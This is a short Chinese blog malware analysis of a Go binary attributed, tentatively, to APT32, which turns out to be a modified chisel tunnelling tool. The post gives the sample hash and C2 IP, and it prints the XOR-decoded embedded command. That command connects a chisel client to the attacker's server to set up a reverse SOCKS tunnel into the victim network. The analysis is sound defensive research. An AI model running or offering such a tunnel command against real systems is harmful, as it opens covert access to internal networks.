疑似APT32 魔改chisel

样本基本信息

image-20240328105923560

64位控制台程序,由go语言编写

MD5: DB1F693F4C88E46545BFB7A2157B25AA

样本分析

虚拟机运行后请求IP 139.99.71.234

image-20240328110128194

运行出现明显的运行提示,IDA反编译发现有明显的参数特征,尝试添加参数运行失败,根据初步怀疑是开源工具修改

image-20240328110725298

根据字符串可以定位到chisel内网穿透工具 https://github.com/jpillora/chisel

image-20240328111456606

对比Github上的源码以及反汇编之后的函数结构,可以认定该样本为开源工具chisel修改编译而成(左:样本;右:开源源码编译)

image-20240328152530922

原版chisel使用命令行界面

image-20240328112251438

基本执行流程和源码一致,主要差别在于内置配置命令,建立隧道反向代理

image-20240328132218077

image-20240328153322582

通过XOR数组,解码出要执行的命令

1
(chisel) client --tls-skip-verify --fingerprint OQOI4xljZo9Gd1Z/CHcfm/KkEPssbpEg/zcIHq4lqBk= --max-retry-interval 60m https://139.99.71.234 R:1080:socks

即在受害主机上启动Chisel工具,建立一个加密的隧道连接到指定的Chisel服务器,实现反向代理,允许攻击者访问内部网络。


疑似APT32 魔改chisel
http://wangchenchina.github.io/2024/03/28/疑似APT32-魔改chisel/
作者
Demo
发布于
2024年3月28日
许可协议